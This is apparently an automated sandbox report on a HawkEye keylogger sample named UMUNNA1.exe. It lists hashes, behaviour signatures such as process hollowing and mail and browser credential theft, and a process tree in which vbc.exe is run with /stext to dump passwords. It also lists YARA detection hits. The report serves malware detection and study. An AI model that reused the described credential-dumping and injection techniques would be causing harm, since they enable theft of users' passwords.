Play interactive tour

Edit tour

Windows Analysis Report UMUNNA1.exe

Overview

General Information

Sample Name:	UMUNNA1.exe
Analysis ID:	443952
MD5:	88fd4cf81a72a7a8642b4e248626bd28
SHA1:	10f58d151e0ce590c27d2a9c33a2c5f8fdbf518b
SHA256:	6bad2fb94eb774403450fc90c697e457c2d260eb0b20a96f15ee82cef6f74d86
Tags:	exeHawkEye
Infos:
Most interesting Screenshot:

Detection

HawkEye MailPassView

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected HawkEye Rat

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected HawkEye Keylogger

Yara detected MailPassView

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Allocates memory in foreign processes

Changes the view of files in windows explorer (hidden files and folders)

Contains functionality to log keystrokes (.Net Source)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

May check the online IP address of the machine

Sample uses process hollowing technique

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

UMUNNA1.exe (PID: 6940 cmdline: 'C:\Users\user\Desktop\UMUNNA1.exe' MD5: 88FD4CF81A72A7A8642B4E248626BD28)

UMUNNA1.exe (PID: 5052 cmdline: C:\Users\user\Desktop\UMUNNA1.exe MD5: 88FD4CF81A72A7A8642B4E248626BD28)

vbc.exe (PID: 4116 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)

vbc.exe (PID: 660 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)

cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.688595177.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000004.00000002.925540625.00000000066C0000.00000004.00000001.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000004.00000002.925557781.0000000006810000.00000004.00000001.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x23a730:$key: HawkEyeKeylogger 0x2bc9ca:$key: HawkEyeKeylogger 0x33e9ea:$key: HawkEyeKeylogger 0x23c946:$salt: 099u787978786 0x2bebe0:$salt: 099u787978786 0x340c00:$salt: 099u787978786 0x23ad61:$string1: HawkEye_Keylogger 0x23bbb4:$string1: HawkEye_Keylogger 0x23c8a6:$string1: HawkEye_Keylogger 0x2bcffb:$string1: HawkEye_Keylogger 0x2bde4e:$string1: HawkEye_Keylogger 0x2beb40:$string1: HawkEye_Keylogger 0x33f01b:$string1: HawkEye_Keylogger 0x33fe6e:$string1: HawkEye_Keylogger 0x340b60:$string1: HawkEye_Keylogger 0x23b14a:$string2: holdermail.txt 0x23b16a:$string2: holdermail.txt 0x2bd3e4:$string2: holdermail.txt 0x2bd404:$string2: holdermail.txt 0x33f404:$string2: holdermail.txt 0x33f424:$string2: holdermail.txt
00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x23adb9:$hawkstr1: HawkEye Keylogger 0x23bbfa:$hawkstr1: HawkEye Keylogger 0x23bf29:$hawkstr1: HawkEye Keylogger 0x23c084:$hawkstr1: HawkEye Keylogger 0x23c1e7:$hawkstr1: HawkEye Keylogger 0x23c460:$hawkstr1: HawkEye Keylogger 0x2bd053:$hawkstr1: HawkEye Keylogger 0x2bde94:$hawkstr1: HawkEye Keylogger 0x2be1c3:$hawkstr1: HawkEye Keylogger 0x2be31e:$hawkstr1: HawkEye Keylogger 0x2be481:$hawkstr1: HawkEye Keylogger 0x2be6fa:$hawkstr1: HawkEye Keylogger 0x33f073:$hawkstr1: HawkEye Keylogger 0x33feb4:$hawkstr1: HawkEye Keylogger 0x3401e3:$hawkstr1: HawkEye Keylogger 0x34033e:$hawkstr1: HawkEye Keylogger 0x3404a1:$hawkstr1: HawkEye Keylogger 0x34071a:$hawkstr1: HawkEye Keylogger 0x23a947:$hawkstr2: Dear HawkEye Customers! 0x23bf7c:$hawkstr2: Dear HawkEye Customers! 0x23c0d3:$hawkstr2: Dear HawkEye Customers!
00000005.00000002.682749011.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b6e2:$key: HawkEyeKeylogger 0x7d8f8:$salt: 099u787978786 0x7bd13:$string1: HawkEye_Keylogger 0x7cb66:$string1: HawkEye_Keylogger 0x7d858:$string1: HawkEye_Keylogger 0x7c0fc:$string2: holdermail.txt 0x7c11c:$string2: holdermail.txt 0x7c03e:$string3: wallet.dat 0x7c056:$string3: wallet.dat 0x7c06c:$string3: wallet.dat 0x7d43a:$string4: Keylog Records 0x7d752:$string4: Keylog Records 0x7d950:$string5: do not script --> 0x7b6ca:$string6: \pidloc.txt 0x7b748:$string7: BSPLIT 0x7b758:$string7: BSPLIT
00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd6b:$hawkstr1: HawkEye Keylogger 0x7cbac:$hawkstr1: HawkEye Keylogger 0x7cedb:$hawkstr1: HawkEye Keylogger 0x7d036:$hawkstr1: HawkEye Keylogger 0x7d199:$hawkstr1: HawkEye Keylogger 0x7d412:$hawkstr1: HawkEye Keylogger 0x7b8f9:$hawkstr2: Dear HawkEye Customers! 0x7cf2e:$hawkstr2: Dear HawkEye Customers! 0x7d085:$hawkstr2: Dear HawkEye Customers! 0x7d1ec:$hawkstr2: Dear HawkEye Customers! 0x7ba1a:$hawkstr3: HawkEye Logger Details:
00000004.00000002.923406374.0000000003B61000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000004.00000002.923406374.0000000003B61000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x42150:$hawkstr1: HawkEye Keylogger 0x43420:$hawkstr1: HawkEye Keylogger 0x43e80:$hawkstr1: HawkEye Keylogger 0x46c84:$hawkstr1: HawkEye Keylogger 0x41bc8:$hawkstr2: Dear HawkEye Customers! 0x43484:$hawkstr2: Dear HawkEye Customers! 0x43ee4:$hawkstr2: Dear HawkEye Customers! 0x41cfa:$hawkstr3: HawkEye Logger Details:
Process Memory Space: UMUNNA1.exe PID: 6940	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: UMUNNA1.exe PID: 6940	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: UMUNNA1.exe PID: 6940	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: UMUNNA1.exe PID: 5052	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: UMUNNA1.exe PID: 5052	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: UMUNNA1.exe PID: 5052	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: vbc.exe PID: 660	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: vbc.exe PID: 4116	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.UMUNNA1.exe.88fa72.3.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.UMUNNA1.exe.6810000.11.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.UMUNNA1.exe.3b80020.8.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.UMUNNA1.exe.3b67e00.7.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.UMUNNA1.exe.839c0d.4.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
6.2.vbc.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.UMUNNA1.exe.3b80020.8.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.UMUNNA1.exe.66c0000.10.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.UMUNNA1.exe.88fa72.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dc70:$key: HawkEyeKeylogger 0x1fe86:$salt: 099u787978786 0x1e2a1:$string1: HawkEye_Keylogger 0x1f0f4:$string1: HawkEye_Keylogger 0x1fde6:$string1: HawkEye_Keylogger 0x1e68a:$string2: holdermail.txt 0x1e6aa:$string2: holdermail.txt 0x1e5cc:$string3: wallet.dat 0x1e5e4:$string3: wallet.dat 0x1e5fa:$string3: wallet.dat 0x1f9c8:$string4: Keylog Records 0x1fce0:$string4: Keylog Records 0x1fede:$string5: do not script --> 0x1dc58:$string6: \pidloc.txt 0x1dcd6:$string7: BSPLIT 0x1dce6:$string7: BSPLIT
4.2.UMUNNA1.exe.88fa72.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.UMUNNA1.exe.88fa72.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.UMUNNA1.exe.88fa72.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e2f9:$hawkstr1: HawkEye Keylogger 0x1f13a:$hawkstr1: HawkEye Keylogger 0x1f469:$hawkstr1: HawkEye Keylogger 0x1f5c4:$hawkstr1: HawkEye Keylogger 0x1f727:$hawkstr1: HawkEye Keylogger 0x1f9a0:$hawkstr1: HawkEye Keylogger 0x1de87:$hawkstr2: Dear HawkEye Customers! 0x1f4bc:$hawkstr2: Dear HawkEye Customers! 0x1f613:$hawkstr2: Dear HawkEye Customers! 0x1f77a:$hawkstr2: Dear HawkEye Customers! 0x1dfa8:$hawkstr3: HawkEye Logger Details:
4.2.UMUNNA1.exe.3b67e00.7.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.UMUNNA1.exe.3b67e00.7.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
5.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
5.2.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
6.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.UMUNNA1.exe.3d97c5b.3.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.UMUNNA1.exe.3d8fe4e.4.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x79ae2:$key: HawkEyeKeylogger 0x7bcf8:$salt: 099u787978786 0x7a113:$string1: HawkEye_Keylogger 0x7af66:$string1: HawkEye_Keylogger 0x7bc58:$string1: HawkEye_Keylogger 0x7a4fc:$string2: holdermail.txt 0x7a51c:$string2: holdermail.txt 0x7a43e:$string3: wallet.dat 0x7a456:$string3: wallet.dat 0x7a46c:$string3: wallet.dat 0x7b83a:$string4: Keylog Records 0x7bb52:$string4: Keylog Records 0x7bd50:$string5: do not script --> 0x79aca:$string6: \pidloc.txt 0x79b48:$string7: BSPLIT 0x79b58:$string7: BSPLIT
0.2.UMUNNA1.exe.3d8fe4e.4.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x5623:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0.2.UMUNNA1.exe.3d8fe4e.4.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0.2.UMUNNA1.exe.3d8fe4e.4.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0.2.UMUNNA1.exe.3d8fe4e.4.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.UMUNNA1.exe.3d8fe4e.4.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7a16b:$hawkstr1: HawkEye Keylogger 0x7afac:$hawkstr1: HawkEye Keylogger 0x7b2db:$hawkstr1: HawkEye Keylogger 0x7b436:$hawkstr1: HawkEye Keylogger 0x7b599:$hawkstr1: HawkEye Keylogger 0x7b812:$hawkstr1: HawkEye Keylogger 0x79cf9:$hawkstr2: Dear HawkEye Customers! 0x7b32e:$hawkstr2: Dear HawkEye Customers! 0x7b485:$hawkstr2: Dear HawkEye Customers! 0x7b5ec:$hawkstr2: Dear HawkEye Customers! 0x79e1a:$hawkstr3: HawkEye Logger Details:
4.2.UMUNNA1.exe.830000.1.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8e2:$key: HawkEyeKeylogger 0x7daf8:$salt: 099u787978786 0x7bf13:$string1: HawkEye_Keylogger 0x7cd66:$string1: HawkEye_Keylogger 0x7da58:$string1: HawkEye_Keylogger 0x7c2fc:$string2: holdermail.txt 0x7c31c:$string2: holdermail.txt 0x7c23e:$string3: wallet.dat 0x7c256:$string3: wallet.dat 0x7c26c:$string3: wallet.dat 0x7d63a:$string4: Keylog Records 0x7d952:$string4: Keylog Records 0x7db50:$string5: do not script --> 0x7b8ca:$string6: \pidloc.txt 0x7b948:$string7: BSPLIT 0x7b958:$string7: BSPLIT
4.2.UMUNNA1.exe.830000.1.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.UMUNNA1.exe.830000.1.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.UMUNNA1.exe.830000.1.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.UMUNNA1.exe.830000.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.UMUNNA1.exe.830000.1.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf6b:$hawkstr1: HawkEye Keylogger 0x7cdac:$hawkstr1: HawkEye Keylogger 0x7d0db:$hawkstr1: HawkEye Keylogger 0x7d236:$hawkstr1: HawkEye Keylogger 0x7d399:$hawkstr1: HawkEye Keylogger 0x7d612:$hawkstr1: HawkEye Keylogger 0x7baf9:$hawkstr2: Dear HawkEye Customers! 0x7d12e:$hawkstr2: Dear HawkEye Customers! 0x7d285:$hawkstr2: Dear HawkEye Customers! 0x7d3ec:$hawkstr2: Dear HawkEye Customers! 0x7bc1a:$hawkstr3: HawkEye Logger Details:
4.2.UMUNNA1.exe.839c0d.4.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73ad5:$key: HawkEyeKeylogger 0x75ceb:$salt: 099u787978786 0x74106:$string1: HawkEye_Keylogger 0x74f59:$string1: HawkEye_Keylogger 0x75c4b:$string1: HawkEye_Keylogger 0x744ef:$string2: holdermail.txt 0x7450f:$string2: holdermail.txt 0x74431:$string3: wallet.dat 0x74449:$string3: wallet.dat 0x7445f:$string3: wallet.dat 0x7582d:$string4: Keylog Records 0x75b45:$string4: Keylog Records 0x75d43:$string5: do not script --> 0x73abd:$string6: \pidloc.txt 0x73b3b:$string7: BSPLIT 0x73b4b:$string7: BSPLIT
4.2.UMUNNA1.exe.839c0d.4.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.UMUNNA1.exe.839c0d.4.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.UMUNNA1.exe.839c0d.4.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.UMUNNA1.exe.839c0d.4.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7415e:$hawkstr1: HawkEye Keylogger 0x74f9f:$hawkstr1: HawkEye Keylogger 0x752ce:$hawkstr1: HawkEye Keylogger 0x75429:$hawkstr1: HawkEye Keylogger 0x7558c:$hawkstr1: HawkEye Keylogger 0x75805:$hawkstr1: HawkEye Keylogger 0x73cec:$hawkstr2: Dear HawkEye Customers! 0x75321:$hawkstr2: Dear HawkEye Customers! 0x75478:$hawkstr2: Dear HawkEye Customers! 0x755df:$hawkstr2: Dear HawkEye Customers! 0x73e0d:$hawkstr3: HawkEye Logger Details:
0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8e2:$key: HawkEyeKeylogger 0xfdb7c:$key: HawkEyeKeylogger 0x17fb9c:$key: HawkEyeKeylogger 0x7daf8:$salt: 099u787978786 0xffd92:$salt: 099u787978786 0x181db2:$salt: 099u787978786 0x7bf13:$string1: HawkEye_Keylogger 0x7cd66:$string1: HawkEye_Keylogger 0x7da58:$string1: HawkEye_Keylogger 0xfe1ad:$string1: HawkEye_Keylogger 0xff000:$string1: HawkEye_Keylogger 0xffcf2:$string1: HawkEye_Keylogger 0x1801cd:$string1: HawkEye_Keylogger 0x181020:$string1: HawkEye_Keylogger 0x181d12:$string1: HawkEye_Keylogger 0x7c2fc:$string2: holdermail.txt 0x7c31c:$string2: holdermail.txt 0xfe596:$string2: holdermail.txt 0xfe5b6:$string2: holdermail.txt 0x1805b6:$string2: holdermail.txt 0x1805d6:$string2: holdermail.txt
0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x896bd:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x10b6dd:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf6b:$hawkstr1: HawkEye Keylogger 0x7cdac:$hawkstr1: HawkEye Keylogger 0x7d0db:$hawkstr1: HawkEye Keylogger 0x7d236:$hawkstr1: HawkEye Keylogger 0x7d399:$hawkstr1: HawkEye Keylogger 0x7d612:$hawkstr1: HawkEye Keylogger 0xfe205:$hawkstr1: HawkEye Keylogger 0xff046:$hawkstr1: HawkEye Keylogger 0xff375:$hawkstr1: HawkEye Keylogger 0xff4d0:$hawkstr1: HawkEye Keylogger 0xff633:$hawkstr1: HawkEye Keylogger 0xff8ac:$hawkstr1: HawkEye Keylogger 0x180225:$hawkstr1: HawkEye Keylogger 0x181066:$hawkstr1: HawkEye Keylogger 0x181395:$hawkstr1: HawkEye Keylogger 0x1814f0:$hawkstr1: HawkEye Keylogger 0x181653:$hawkstr1: HawkEye Keylogger 0x1818cc:$hawkstr1: HawkEye Keylogger 0x7baf9:$hawkstr2: Dear HawkEye Customers! 0x7d12e:$hawkstr2: Dear HawkEye Customers! 0x7d285:$hawkstr2: Dear HawkEye Customers!
4.2.UMUNNA1.exe.838208.2.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x754da:$key: HawkEyeKeylogger 0x776f0:$salt: 099u787978786 0x75b0b:$string1: HawkEye_Keylogger 0x7695e:$string1: HawkEye_Keylogger 0x77650:$string1: HawkEye_Keylogger 0x75ef4:$string2: holdermail.txt 0x75f14:$string2: holdermail.txt 0x75e36:$string3: wallet.dat 0x75e4e:$string3: wallet.dat 0x75e64:$string3: wallet.dat 0x77232:$string4: Keylog Records 0x7754a:$string4: Keylog Records 0x77748:$string5: do not script --> 0x754c2:$string6: \pidloc.txt 0x75540:$string7: BSPLIT 0x75550:$string7: BSPLIT
4.2.UMUNNA1.exe.838208.2.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.UMUNNA1.exe.838208.2.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.UMUNNA1.exe.838208.2.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.UMUNNA1.exe.838208.2.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.UMUNNA1.exe.838208.2.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b63:$hawkstr1: HawkEye Keylogger 0x769a4:$hawkstr1: HawkEye Keylogger 0x76cd3:$hawkstr1: HawkEye Keylogger 0x76e2e:$hawkstr1: HawkEye Keylogger 0x76f91:$hawkstr1: HawkEye Keylogger 0x7720a:$hawkstr1: HawkEye Keylogger 0x756f1:$hawkstr2: Dear HawkEye Customers! 0x76d26:$hawkstr2: Dear HawkEye Customers! 0x76e7d:$hawkstr2: Dear HawkEye Customers! 0x76fe4:$hawkstr2: Dear HawkEye Customers! 0x75812:$hawkstr3: HawkEye Logger Details:
4.2.UMUNNA1.exe.2ba7f28.5.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0.2.UMUNNA1.exe.3d96256.5.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x754da:$key: HawkEyeKeylogger 0xf7774:$key: HawkEyeKeylogger 0x179794:$key: HawkEyeKeylogger 0x776f0:$salt: 099u787978786 0xf998a:$salt: 099u787978786 0x17b9aa:$salt: 099u787978786 0x75b0b:$string1: HawkEye_Keylogger 0x7695e:$string1: HawkEye_Keylogger 0x77650:$string1: HawkEye_Keylogger 0xf7da5:$string1: HawkEye_Keylogger 0xf8bf8:$string1: HawkEye_Keylogger 0xf98ea:$string1: HawkEye_Keylogger 0x179dc5:$string1: HawkEye_Keylogger 0x17ac18:$string1: HawkEye_Keylogger 0x17b90a:$string1: HawkEye_Keylogger 0x75ef4:$string2: holdermail.txt 0x75f14:$string2: holdermail.txt 0xf818e:$string2: holdermail.txt 0xf81ae:$string2: holdermail.txt 0x17a1ae:$string2: holdermail.txt 0x17a1ce:$string2: holdermail.txt
0.2.UMUNNA1.exe.3d96256.5.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x832b5:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x1052d5:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0.2.UMUNNA1.exe.3d96256.5.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0.2.UMUNNA1.exe.3d96256.5.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0.2.UMUNNA1.exe.3d96256.5.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.UMUNNA1.exe.3d96256.5.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b63:$hawkstr1: HawkEye Keylogger 0x769a4:$hawkstr1: HawkEye Keylogger 0x76cd3:$hawkstr1: HawkEye Keylogger 0x76e2e:$hawkstr1: HawkEye Keylogger 0x76f91:$hawkstr1: HawkEye Keylogger 0x7720a:$hawkstr1: HawkEye Keylogger 0xf7dfd:$hawkstr1: HawkEye Keylogger 0xf8c3e:$hawkstr1: HawkEye Keylogger 0xf8f6d:$hawkstr1: HawkEye Keylogger 0xf90c8:$hawkstr1: HawkEye Keylogger 0xf922b:$hawkstr1: HawkEye Keylogger 0xf94a4:$hawkstr1: HawkEye Keylogger 0x179e1d:$hawkstr1: HawkEye Keylogger 0x17ac5e:$hawkstr1: HawkEye Keylogger 0x17af8d:$hawkstr1: HawkEye Keylogger 0x17b0e8:$hawkstr1: HawkEye Keylogger 0x17b24b:$hawkstr1: HawkEye Keylogger 0x17b4c4:$hawkstr1: HawkEye Keylogger 0x756f1:$hawkstr2: Dear HawkEye Customers! 0x76d26:$hawkstr2: Dear HawkEye Customers! 0x76e7d:$hawkstr2: Dear HawkEye Customers!
0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73ad5:$key: HawkEyeKeylogger 0xf5d6f:$key: HawkEyeKeylogger 0x177d8f:$key: HawkEyeKeylogger 0x75ceb:$salt: 099u787978786 0xf7f85:$salt: 099u787978786 0x179fa5:$salt: 099u787978786 0x74106:$string1: HawkEye_Keylogger 0x74f59:$string1: HawkEye_Keylogger 0x75c4b:$string1: HawkEye_Keylogger 0xf63a0:$string1: HawkEye_Keylogger 0xf71f3:$string1: HawkEye_Keylogger 0xf7ee5:$string1: HawkEye_Keylogger 0x1783c0:$string1: HawkEye_Keylogger 0x179213:$string1: HawkEye_Keylogger 0x179f05:$string1: HawkEye_Keylogger 0x744ef:$string2: holdermail.txt 0x7450f:$string2: holdermail.txt 0xf6789:$string2: holdermail.txt 0xf67a9:$string2: holdermail.txt 0x1787a9:$string2: holdermail.txt 0x1787c9:$string2: holdermail.txt
